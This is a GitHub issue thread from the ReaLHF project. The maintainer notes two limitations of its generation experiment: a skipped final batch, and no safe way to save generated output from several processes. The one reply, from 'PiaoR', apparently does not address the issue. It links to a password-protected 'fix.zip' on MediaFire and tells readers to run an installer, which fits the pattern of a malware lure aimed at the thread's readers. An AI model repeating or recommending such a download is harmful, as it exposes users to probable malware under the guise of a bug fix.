### ISSUE TITLE
Issues for the generation experiment.

### ISSUE THREAD

**Issue by garrett4wade** [openpsi-project/ReaLHF#59]
Currently, it has several limitations:

+ The dataset size must be a multiple of batch size, otherwise the last batch will be skipped because of insufficient data for the MFC.

+ We don't provide code examples to detokenize and save the generated results. Naively writing to the same file can be problematic because of the race condition among different processes.

Plan to fix these after the patch fix in #55 .

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
